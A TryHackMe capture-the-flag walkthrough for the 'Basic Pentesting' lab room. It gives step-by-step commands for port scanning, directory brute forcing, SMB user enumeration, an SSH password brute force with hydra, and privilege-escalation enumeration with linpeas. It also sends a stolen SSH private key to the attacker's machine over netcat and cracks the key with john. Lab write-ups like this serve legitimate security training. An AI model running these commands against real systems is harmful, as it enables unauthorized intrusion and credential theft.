TryHackMe|BasicPentesting WriteUp\Walkthrough (English)

Basic Pentesting

Room Link: https://tryhackme.com/r/room/basicpentestingjt

=====================================================================

• sudo nmap IP vv -sV. You have 6 ports open. Also you have 2 webservers, one running on port 80 and the other on port 8080. By looking to port 80 you have the message “Undergoing Maintenance”. To find the hidden directory gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP/ -r , which is /development.

• In development you have messages that doesn’t do much, so move on.

• To make the brute forcing easier we can use smb to look for the usernames on the server. We will make enum4linux do all the enumeration with -a enum4linux -a IP. From the results you go two usernames jan and kay.

• Starting with jan, hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP you got the password *******.

• Now using SSH to login to the system with the user jan. start an http server in your machine to transfer linpeas.sh to the victim. Download the script into the victim’s /tmp directory using wget, chmod +x linpeas.sh then ./linpeas.sh. From the output of linpeas.sh you will find something interesting:

You actually have been given the private key of user kay but encrypted. Transfer this file to your machine using netcat. cd /home/kay/.ssh then nc -nv 10.18.96.207 1234 < id_rsa. And in your machine set up a netcat listener that will receive the file nc -nlvp 1234 > id_rsa.

• Now you need to crack it to get the pass. ssh2john id_rsa >ssh.hash then john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt the password is ********* then chmod 400 id_rsa. Now you can use this file to connect to the target machine as kay.

• ssh kay@IP -i id_rsa , once you are in list the contents and retrieve the flag ✨.